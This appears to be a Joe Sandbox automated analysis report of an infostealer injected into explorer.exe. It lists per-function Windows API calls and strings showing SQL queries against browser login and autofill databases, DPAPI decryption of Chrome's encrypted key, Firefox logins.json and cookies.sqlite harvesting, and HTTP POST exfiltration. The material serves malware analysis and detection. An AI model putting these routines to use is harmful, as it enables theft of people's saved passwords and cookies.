                          • Part of subcall function 03001B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,03002893,00000000,00000000,00000000,?), ref: 03001B82
                          • Part of subcall function 03001B6A: FindCloseChangeNotification.KERNELBASE(00000000), ref: 03001B8F
                        • GetTempPathW.KERNEL32(00000104,00000000), ref: 030030F9
                        • GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 03003103
                        • DeleteFileW.KERNELBASE(00000000), ref: 0300310A
                        • CopyFileW.KERNELBASE(?,00000000,00000000), ref: 03003115
                        • RtlCompareMemory.NTDLL(00000000,00000000,00000003), ref: 030031A4
                        • RtlZeroMemory.NTDLL(?,00000040), ref: 030031D7
                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 030032DF
                        • DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 0300339C
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: File$DeleteMemoryTemp$ChangeCloseCompareCopyCreateCryptDataFindNameNotificationPathUnprotectZero
                        • String ID: 0$@$SELECT origin_url,username_value,password_value FROM logins$v1
                        • API String ID: 1468962943-4052020286
                        • Opcode ID: 36bf1c77fa61fab7536363b97ec7432c3f6a47248c4e16ae3d0417f69c02e552
                        • Instruction ID: cff45e094d8b39239ad7fbdc395531ba620f879383039fe17f0d6688658d3da7
                        • Opcode Fuzzy Hash: 36bf1c77fa61fab7536363b97ec7432c3f6a47248c4e16ae3d0417f69c02e552
                        • Instruction Fuzzy Hash: 2791BC7920A341AFE716EF25C884B7FBBE9AFC5744F08492DF5859A290DB35D804CB12

                        Control-flow Graph

                        APIs
                          • Part of subcall function 03001000: GetProcessHeap.KERNEL32(00000008,?,030011C7,?,?,00000001,00000000,?), ref: 03001003
                          • Part of subcall function 03001000: RtlAllocateHeap.NTDLL(00000000), ref: 0300100A
                        • PathCombineW.SHLWAPI(00000000,00000000,*.*,?,00000000), ref: 03003F0A
                        • FindFirstFileW.KERNELBASE(00000000,?,?,00000000), ref: 03003F16
                        • lstrcmpiW.KERNEL32(?,030562CC), ref: 03003F38
                        • lstrcmpiW.KERNEL32(?,030562D0), ref: 03003F4C
                        • PathCombineW.SHLWAPI(00000000,00000000,?), ref: 03003F69
                        • lstrcmpiW.KERNEL32(?,Local State), ref: 03003F7E
                        • PathCombineW.SHLWAPI(00000000,00000000,?), ref: 03003F9B
                        • FindNextFileW.KERNELBASE(00000000,00000010), ref: 03003FB5
                        • FindClose.KERNELBASE(00000000), ref: 03003FC4
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: CombineFindPathlstrcmpi$FileHeap$AllocateCloseFirstNextProcess
                        • String ID: *.*$Local State
                        • API String ID: 3923353463-3324723383
                        • Opcode ID: 97453968c2d68851b53fa98d94ecb97475beb4c87d00772868364ce9a90c9b8c
                        • Instruction ID: 2ace4a465ada8a2351f5736bfcddaaf74f9a071fb2aff5b0688116ff9f91db43
                        • Opcode Fuzzy Hash: 97453968c2d68851b53fa98d94ecb97475beb4c87d00772868364ce9a90c9b8c
                        • Instruction Fuzzy Hash: 8021D3392023486BE755F6308C0CA7FB6BCDBC5341F482569F952C61C1DB7A94088662

                        Control-flow Graph

                        APIs
                          • Part of subcall function 03001953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,03002F0C), ref: 03001973
                          • Part of subcall function 03001953: lstrlenW.KERNEL32(03056564,?,?,03002F0C), ref: 03001978
                          • Part of subcall function 03001953: lstrcatW.KERNEL32(00000000,?), ref: 03001990
                          • Part of subcall function 03001953: lstrcatW.KERNEL32(00000000,03056564), ref: 03001994
                        • FindFirstFileW.KERNELBASE(00000000,?,00000000,00000000,?,00000000), ref: 03002B3D
                        • lstrcmpiW.KERNEL32(?,030562CC), ref: 03002B63
                        • lstrcmpiW.KERNEL32(?,030562D0), ref: 03002B7B
                          • Part of subcall function 030019B4: lstrlenW.KERNEL32(00000000,00000000,00000000,03002CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 030019C4
                        • StrStrIW.SHLWAPI(00000000,logins.json), ref: 03002BE7
                        • StrStrIW.SHLWAPI(00000000,cookies.sqlite), ref: 03002C16
                        • FindNextFileW.KERNELBASE(00000000,00000010), ref: 03002C43
                        • FindClose.KERNELBASE(00000000), ref: 03002C52
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: Findlstrlen$Filelstrcatlstrcmpi$CloseFirstNext
                        • String ID: \*.*$cookies.sqlite$logins.json
                        • API String ID: 1108783765-3717368146
                        • Opcode ID: 5092c27d232cb4cae03621a09b1f1e5c82ee530465d7b4778140f4ed233aacf3
                        • Instruction ID: 88d66d07cd9048b72aaa50ca65f536bab8ab05f26ca1e836e83a83135df0adbd
                        • Opcode Fuzzy Hash: 5092c27d232cb4cae03621a09b1f1e5c82ee530465d7b4778140f4ed233aacf3
                        • Instruction Fuzzy Hash: 4A31B4383073095BEB19FB70888897F72DEABC4300F485D2CA986DB2C1DF7AC9068251

                        Control-flow Graph
                        (graph rendering not reproduced; legend: Executed / Not Executed)
                        APIs
                          • Part of subcall function 030019B4: lstrlenW.KERNEL32(00000000,00000000,00000000,03002CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 030019C4
                        • FindFirstFileW.KERNELBASE(00000000,?,?,00000000), ref: 03001DA9
                        • lstrcmpiW.KERNEL32(?,030562CC), ref: 03001DCF
                        • lstrcmpiW.KERNEL32(?,030562D0), ref: 03001DE7
                        • lstrcmpiW.KERNEL32(?,?), ref: 03001E62
                          • Part of subcall function 03001CF7: lstrlenW.KERNEL32(00000000,00000000,00000000,03002C27), ref: 03001D02
                          • Part of subcall function 03001CF7: RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 03001D0D
                        • FindNextFileW.KERNELBASE(00000000,00000010), ref: 03001E94
                        • FindClose.KERNELBASE(00000000), ref: 03001EA3
                          • Part of subcall function 03001953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,03002F0C), ref: 03001973
                          • Part of subcall function 03001953: lstrlenW.KERNEL32(03056564,?,?,03002F0C), ref: 03001978
                          • Part of subcall function 03001953: lstrcatW.KERNEL32(00000000,?), ref: 03001990
                          • Part of subcall function 03001953: lstrcatW.KERNEL32(00000000,03056564), ref: 03001994
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: lstrlen$Findlstrcmpi$Filelstrcat$CloseComputeCrc32FirstNext
                        • String ID: *.*$\*.*
                        • API String ID: 232625764-1692270452
                        • Opcode ID: b2d742ff11d5b5ad68967a4917ed4fa995b9facf1f8b5093a2f5e63cccf37734
                        • Instruction ID: f8807d6f166e0139bcfa50dcd6f6c56972b1d02daa256351685f4b869c2cbdba
                        • Opcode Fuzzy Hash: b2d742ff11d5b5ad68967a4917ed4fa995b9facf1f8b5093a2f5e63cccf37734
                        • Instruction Fuzzy Hash: 1831FA3C3063455BEB59FB748888ABF77EAAFC4340F441A2DE98A872C5DB75C8058752

                        Control-flow Graph
                        (graph rendering not reproduced; legend: Executed / Not Executed)
                        APIs
                          • Part of subcall function 03001B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,03002893,00000000,00000000,00000000,?), ref: 03001B82
                          • Part of subcall function 03001B6A: FindCloseChangeNotification.KERNELBASE(00000000), ref: 03001B8F
                          • Part of subcall function 03001C31: CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000000,00000000,00000000,03003E1E,00000000,?,03003FA8), ref: 03001C46
                          • Part of subcall function 03001C31: GetFileSize.KERNEL32(00000000,00000000,00000000,?,03003FA8), ref: 03001C56
                          • Part of subcall function 03001C31: ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,03003FA8), ref: 03001C76
                          • Part of subcall function 03001C31: CloseHandle.KERNEL32(00000000,?,03003FA8), ref: 03001C91
                          • Part of subcall function 03002FB1: StrStrIA.KERNELBASE(00000000,"encrypted_key":",00000000,00000000,00000000,03003E30,00000000,00000000,?,03003FA8), ref: 03002FC1
                          • Part of subcall function 03002FB1: lstrlen.KERNEL32("encrypted_key":",?,03003FA8), ref: 03002FCE
                          • Part of subcall function 03002FB1: StrStrIA.SHLWAPI("encrypted_key":",0305692C,?,03003FA8), ref: 03002FDD
                          • Part of subcall function 0300123B: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,03003E4B,00000000), ref: 0300124A
                          • Part of subcall function 0300123B: CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 03001268
                          • Part of subcall function 0300123B: CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 03001295
                        • RtlCompareMemory.NTDLL(00000000,IDPAP,00000005), ref: 03003E74
                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 03003E9E
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: File$Crypt$BinaryCloseCreateStringlstrlen$ChangeCompareDataFindHandleMemoryNotificationReadSizeUnprotect
                        • String ID: $DPAP$DPAP$IDPAP
                        • API String ID: 3124818977-957854035
                        • Opcode ID: 57b8936067b49b19aa3f8950799072526fc31d393cd0e881dff1d6780cef4e40
                        • Instruction ID: bea978bd0319b1678e61efc9d4f5d1254f1f83c55af3ca5c290c0c329fe8abfc
                        • Opcode Fuzzy Hash: 57b8936067b49b19aa3f8950799072526fc31d393cd0e881dff1d6780cef4e40
                        • Instruction Fuzzy Hash: 0821C97A6063856BE716EA658880BBFF2DD6F84700F480A6DE941C72C0EB78C9058792
                        APIs
                          • Part of subcall function 03001162: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0300116F
                        • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 03004BB6
                        • NtUnmapViewOfSection.NTDLL(000000FF), ref: 03004BBF
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: MemoryMoveQuerySectionUnmapViewVirtual
                        • String ID:
                        • API String ID: 1675517319-0
                        • Opcode ID: 589bd61c8bde3833fbb91c9da0c411ab9a4aa911247ac12a3db9c7080a1aa3ec
                        • Instruction ID: 685ad0d6d2d26f39636717322761418f5a202c3627391a5e41c14ac51d9aa2ef
                        • Opcode Fuzzy Hash: 589bd61c8bde3833fbb91c9da0c411ab9a4aa911247ac12a3db9c7080a1aa3ec
                        • Instruction Fuzzy Hash: F8E0923580731067E758FB31F818B8B3B9C9BC5261F108554A255860C4CA3A48008A54
                        APIs
                        • GetProcessHeap.KERNEL32(00000008,?,030011C7,?,?,00000001,00000000,?), ref: 03001003
                        • RtlAllocateHeap.NTDLL(00000000), ref: 0300100A
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: Heap$AllocateProcess
                        • String ID:
                        • API String ID: 1357844191-0
                        • Opcode ID: 5fd83217c053f4534465c5f6b8b074cdb8cfd63d53a65fd701648949befa991d
                        • Instruction ID: 0584a125f0405788abc2298ddefc91ee9ddfa10090e301c8c1f84df266af13ca
                        • Opcode Fuzzy Hash: 5fd83217c053f4534465c5f6b8b074cdb8cfd63d53a65fd701648949befa991d
                        • Instruction Fuzzy Hash: 17A002755513085BDF4477B8DA0DA2B3518F744703F545544718586445DD6954048725
                        APIs
                        • GetSystemInfo.KERNELBASE(030620A4,00000001,00000000,0000000A,03053127,030028DA,00000000,?), ref: 0300BFFC
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: InfoSystem
                        • String ID:
                        • API String ID: 31276548-0
                        • Opcode ID: 3469bc8d25973ca8d57912fa60bc4339eaf5d726e2f44774fdd53995d49597bd
                        • Instruction ID: 553af1b2cd101c28e944d1603f5a5f674aedee3f3f875cb66fc72d2b5a111003
                        • Opcode Fuzzy Hash: 3469bc8d25973ca8d57912fa60bc4339eaf5d726e2f44774fdd53995d49597bd
                        • Instruction Fuzzy Hash: DEE0ED3978770839F614F6F86C46F9E155ACFC0B02F505A15B620AD0CEDBA781611126

                        Control-flow Graph

                        APIs
                          • Part of subcall function 03001B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,03002893,00000000,00000000,00000000,?), ref: 03001B82
                          • Part of subcall function 03001B6A: FindCloseChangeNotification.KERNELBASE(00000000), ref: 03001B8F
                          • Part of subcall function 03001000: GetProcessHeap.KERNEL32(00000008,?,030011C7,?,?,00000001,00000000,?), ref: 03001003
                          • Part of subcall function 03001000: RtlAllocateHeap.NTDLL(00000000), ref: 0300100A
                        • GetTempPathW.KERNEL32(00000104,00000000), ref: 03003C6A
                        • GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 03003C76
                        • DeleteFileW.KERNELBASE(00000000), ref: 03003C7D
                        • CopyFileW.KERNELBASE(?,00000000,00000000), ref: 03003C89
                        • lstrlen.KERNEL32(00000000,?,?,?,?,00000000,00000000,?), ref: 03003D2F
                        • lstrlen.KERNEL32(00000000), ref: 03003D36
                        • wsprintfA.USER32 ref: 03003D55
                        • lstrlen.KERNEL32(00000000), ref: 03003D61
                        • lstrcat.KERNEL32(00000000,?), ref: 03003D89
                        • lstrlen.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 03003DB2
                        • DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 03003DED
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: File$lstrlen$DeleteHeapTemp$AllocateChangeCloseCopyCreateFindNameNotificationPathProcesslstrcatwsprintf
                        • String ID: %s = %s$AUTOFILL$SELECT name,value FROM autofill
                        • API String ID: 2925989150-3488123210
                        • Opcode ID: bd2aa5af8b646a7d04ed7d3e2761e175334e52a9b90d6ab7454bccb5123f253e
                        • Instruction ID: 63a2e52160f48948060127b58eb49317c6113d28914c70a3d36455078b98e10e
                        • Opcode Fuzzy Hash: bd2aa5af8b646a7d04ed7d3e2761e175334e52a9b90d6ab7454bccb5123f253e
                        • Instruction Fuzzy Hash: 2E41BF39206305ABE716FB319C80E7F7AEDAFC5644F44186DF8859B281DA36D8018B62

                        Control-flow Graph

                        APIs
                        • DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 03002AD2
                          • Part of subcall function 03001000: GetProcessHeap.KERNEL32(00000008,?,030011C7,?,?,00000001,00000000,?), ref: 03001003
                          • Part of subcall function 03001000: RtlAllocateHeap.NTDLL(00000000), ref: 0300100A
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?), ref: 030029E1
                        • lstrlen.KERNEL32(00000000), ref: 030029EC
                        • wsprintfA.USER32 ref: 03002A38
                        • lstrlen.KERNEL32(00000000), ref: 03002A44
                        • lstrcat.KERNEL32(00000000,00000000), ref: 03002A6C
                        • lstrlen.KERNEL32(00000000,?,?), ref: 03002A99
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: lstrlen$Heap$AllocateDeleteFileProcesslstrcatwsprintf
                        • String ID: %sTRUE%s%s%s%s%s$COOKIES$FALSE$TRUE
                        • API String ID: 304071051-2605711689
                        • Opcode ID: 773f29a420f42e16e753794a9dcb7efb168d6cf7dfffdb1373d9f1021b4be74d
                        • Instruction ID: 7f601714644c6a0cdbf0c581d5994e9274a43c8698f7c6b837fcfc320bab6a3d
                        • Opcode Fuzzy Hash: 773f29a420f42e16e753794a9dcb7efb168d6cf7dfffdb1373d9f1021b4be74d
                        • Instruction Fuzzy Hash: 7C5191386063469BE729EF25D854A7FB6DAAFC5304F480C2DF8C59B282DB35D8058752

                        Control-flow Graph

                        APIs
                          • Part of subcall function 03001953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,03002F0C), ref: 03001973
                          • Part of subcall function 03001953: lstrlenW.KERNEL32(03056564,?,?,03002F0C), ref: 03001978
                          • Part of subcall function 03001953: lstrcatW.KERNEL32(00000000,?), ref: 03001990
                          • Part of subcall function 03001953: lstrcatW.KERNEL32(00000000,03056564), ref: 03001994
                          • Part of subcall function 03001000: GetProcessHeap.KERNEL32(00000008,?,030011C7,?,?,00000001,00000000,?), ref: 03001003
                          • Part of subcall function 03001000: RtlAllocateHeap.NTDLL(00000000), ref: 0300100A
                          • Part of subcall function 03001B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,03002893,00000000,00000000,00000000,?), ref: 03001B82
                          • Part of subcall function 03001B6A: FindCloseChangeNotification.KERNELBASE(00000000), ref: 03001B8F
                        • GetPrivateProfileSectionNamesW.KERNEL32(00000000,0000FDE8,00000000), ref: 03002D13
                        • StrStrIW.SHLWAPI(00000000,Profile), ref: 03002D45
                        • GetPrivateProfileStringW.KERNEL32(00000000,Path,0305637C,?,00000FFF,?), ref: 03002D68
                        • GetPrivateProfileIntW.KERNEL32(00000000,IsRelative,00000001,?), ref: 03002D7B
                        • lstrlenW.KERNEL32(00000000), ref: 03002DD8
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: PrivateProfilelstrlen$Heaplstrcat$AllocateChangeCloseCreateFileFindNamesNotificationProcessSectionString
                        • String ID: IsRelative$Path$Profile$profiles.ini
                        • API String ID: 4264105018-4107377610
                        • Opcode ID: 35afae9f64dc6b173b4afc05f3e471c94ee22a5e1b0c57c7f1cbf6427134bc56
                        • Instruction ID: 1e22f39b8941528ab0f12de0bc7f744560346cf3df79a5b9bf440000cfcacce4
                        • Opcode Fuzzy Hash: 35afae9f64dc6b173b4afc05f3e471c94ee22a5e1b0c57c7f1cbf6427134bc56
                        • Instruction Fuzzy Hash: 6131A3387063055BE755FF31891467FB6EAAFC4300F44482EE9566B2C1DF768C468752

                        Control-flow Graph

                        APIs
                          • Part of subcall function 03001000: GetProcessHeap.KERNEL32(00000008,?,030011C7,?,?,00000001,00000000,?), ref: 03001003
                          • Part of subcall function 03001000: RtlAllocateHeap.NTDLL(00000000), ref: 0300100A
                          • Part of subcall function 0300106C: lstrlen.KERNEL32(03246DEE,00000000,00000000,00000000,03001366,74DE8A60,03246DEE,00000000), ref: 03001074
                          • Part of subcall function 0300106C: MultiByteToWideChar.KERNEL32(00000000,00000000,03246DEE,00000001,00000000,00000000), ref: 03001086
                          • Part of subcall function 030012A3: RtlZeroMemory.NTDLL(?,00000018), ref: 030012B5
                        • RtlZeroMemory.NTDLL(?,0000003C), ref: 030013C2
                        • wsprintfW.USER32 ref: 030014B5
                        • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 03001594
                        Strings
                        • Accept: */*Referer: %S, xrefs: 030014AF
                        • Content-Type: application/x-www-form-urlencoded, xrefs: 030014FB
                        • POST, xrefs: 03001465
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: Memory$HeapZero$AllocateByteCharMoveMultiProcessWidelstrlenwsprintf
                        • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$POST
                        • API String ID: 3833683434-704803497
                        • Opcode ID: 50a8c7a66bb1bbb17bdf555959aec9386e38b493646fab7cf8e8bf18fe57fd02
                        • Instruction ID: d7b9e249d00e3d4d0e2e71ac1d26b946a0d0b07844ac507b520442723955341d
                        • Opcode Fuzzy Hash: 50a8c7a66bb1bbb17bdf555959aec9386e38b493646fab7cf8e8bf18fe57fd02
                        • Instruction Fuzzy Hash: 3671BE7860A305AFE754EF68D884A2BBBE9FF88340F44092DF981C7291DB75C904CB56

                        Control-flow Graph

                        APIs
                        • CreateFileMappingW.KERNELBASE(?,00000000,00000004,00000000,00000006,00000000,?,?,00000000), ref: 0300B31D
                        • MapViewOfFile.KERNELBASE(?,?,00000000,?,?), ref: 0300B34F
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: File$CreateMappingView
                        • String ID: winShmMap1$winShmMap2$winShmMap3
                        • API String ID: 3452162329-3826999013
                        • Opcode ID: a0fdd957a188a9a9100594f75562a08ede2fe0008c4adb49c3f756695f02979c
                        • Instruction ID: e8409d6e123b6536c024295c0166f0c5fcbbf1bdf5d808a11fc1c8eb82aaa3ed
                        • Opcode Fuzzy Hash: a0fdd957a188a9a9100594f75562a08ede2fe0008c4adb49c3f756695f02979c
                        • Instruction Fuzzy Hash: D751C175205701DFEB25CF28C840A6BB7E6FF84314F14882EE9928B2D5DBB4E805CB95

                        Control-flow Graph

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: memcpy$FileReadmemset
                        • String ID: winRead
                        • API String ID: 2051157613-2759563040
                        • Opcode ID: 8e2257f7b009a457d88245ffaa122b016908eb467daffa02db006108b000ced7
                        • Instruction ID: a510d23e7dd64e228beb58c7a06da6e29ea799e66cdffab8cb15172634e848d8
                        • Opcode Fuzzy Hash: 8e2257f7b009a457d88245ffaa122b016908eb467daffa02db006108b000ced7
                        • Instruction Fuzzy Hash: DB318F76706340AFE750DE68CC8499FB7EAEFC4350F885928F99587290D670ED048B93

                        Control-flow Graph

                        APIs
                        • StrStrIW.KERNELBASE(?,?), ref: 03002E4B
                        • RegOpenKeyExW.KERNELBASE(?,?,00000000,00020119,?), ref: 03002EE4
                        • RegEnumKeyExW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 03002F54
                        • RegCloseKey.KERNELBASE(?), ref: 03002F62
                          • Part of subcall function 030019E5: RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,03001AE2,PortNumber,00000000,00000000), ref: 03001A1E
                          • Part of subcall function 030019E5: RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 03001A3C
                          • Part of subcall function 030019E5: RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 03001A75
                          • Part of subcall function 030019E5: RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,03001AE2,PortNumber,00000000,00000000), ref: 03001A98
                          • Part of subcall function 03001BC5: lstrlenW.KERNEL32(00000000,00000000,?,03002E75,PathToExe,00000000,00000000), ref: 03001BCC
                          • Part of subcall function 03001BC5: StrStrIW.SHLWAPI(00000000,.exe,?,03002E75,PathToExe,00000000,00000000), ref: 03001BF0
                          • Part of subcall function 03001BC5: StrRChrIW.SHLWAPI(00000000,00000000,0000005C,?,03002E75,PathToExe,00000000,00000000), ref: 03001C05
                          • Part of subcall function 03001BC5: lstrlenW.KERNEL32(00000000,?,03002E75,PathToExe,00000000,00000000), ref: 03001C1C
                          • Part of subcall function 03001AFE: SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,00000000,00000000,?,?,03002E83,PathToExe,00000000,00000000), ref: 03001B16
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: CloseOpenQueryValuelstrlen$EnumFolderPath
                        • String ID: PathToExe
                        • API String ID: 1799103994-1982016430
                        • Opcode ID: 4ad3215a5dfccb338f0ee2d67989f17d6c8c75abff680cc5e78137d0b040303a
                        • Instruction ID: 8973f28c8ee4bd7a94875b284c3d37e895c92c8a5e4128bb61fd2945ab8fa9ef
                        • Opcode Fuzzy Hash: 4ad3215a5dfccb338f0ee2d67989f17d6c8c75abff680cc5e78137d0b040303a
                        • Instruction Fuzzy Hash: D1318F396063556FA719EF21C808DBFBAE9EFC8350F04492CF8958B284DA75C901CBA1

                        Control-flow Graph

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: File_alldiv_allmul
                        • String ID: winTruncate1$winTruncate2
                        • API String ID: 3568847005-470713972
                        • Opcode ID: 915c7d141540b1b67028a783f0bec42cf020d50f594ceb4a44b15491eff7c6a4
                        • Instruction ID: e1e3f7513b45e70f311ab266b3a1424a75bc4f7f1f3e7cd0b665556ba4a7b387
                        • Opcode Fuzzy Hash: 915c7d141540b1b67028a783f0bec42cf020d50f594ceb4a44b15491eff7c6a4
                        • Instruction Fuzzy Hash: CD219876302300ABEF54DE2DCC84EAB77AAEF84710F058169FD58DB285D635D800CBA1
                        APIs
                          • Part of subcall function 03001000: GetProcessHeap.KERNEL32(00000008,?,030011C7,?,?,00000001,00000000,?), ref: 03001003
                          • Part of subcall function 03001000: RtlAllocateHeap.NTDLL(00000000), ref: 0300100A
                        • wsprintfW.USER32 ref: 03004AA2
                        • RegCreateKeyExW.KERNELBASE(80000001,00000000,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 03004AC7
                        • RegCloseKey.KERNELBASE(?), ref: 03004AD4
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: Heap$AllocateCloseCreateProcesswsprintf
                        • String ID: %s\%08x$Software
                        • API String ID: 1800864259-1658101971
                        • Opcode ID: 681b9ae47f8e7122c9db01bf415f2126fc75a27d18510501218d5d34f891e929
                        • Instruction ID: 049a87168267e58840911d994d67dabac1839f3ed097b09d5dbd9026fc93a2a6
                        • Opcode Fuzzy Hash: 681b9ae47f8e7122c9db01bf415f2126fc75a27d18510501218d5d34f891e929
                        • Instruction Fuzzy Hash: A8012475602208BFEB08DB45CC4AEBF77ACEB41314F80016EF900A3140EAB21D009664
                        APIs
                        • _alloca_probe.NTDLL ref: 0300431C
                        • RegOpenKeyW.ADVAPI32(80000001,?,?), ref: 03004335
                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 03004363
                        • RegCloseKey.ADVAPI32(?), ref: 030043C8
                          • Part of subcall function 03001953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,03002F0C), ref: 03001973
                          • Part of subcall function 03001953: lstrlenW.KERNEL32(03056564,?,?,03002F0C), ref: 03001978
                          • Part of subcall function 03001953: lstrcatW.KERNEL32(00000000,?), ref: 03001990
                          • Part of subcall function 03001953: lstrcatW.KERNEL32(00000000,03056564), ref: 03001994
                          • Part of subcall function 0300418A: wsprintfW.USER32 ref: 03004212
                          • Part of subcall function 03001011: GetProcessHeap.KERNEL32(00000000,00000000,?,03001A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,03001AE2), ref: 03001020
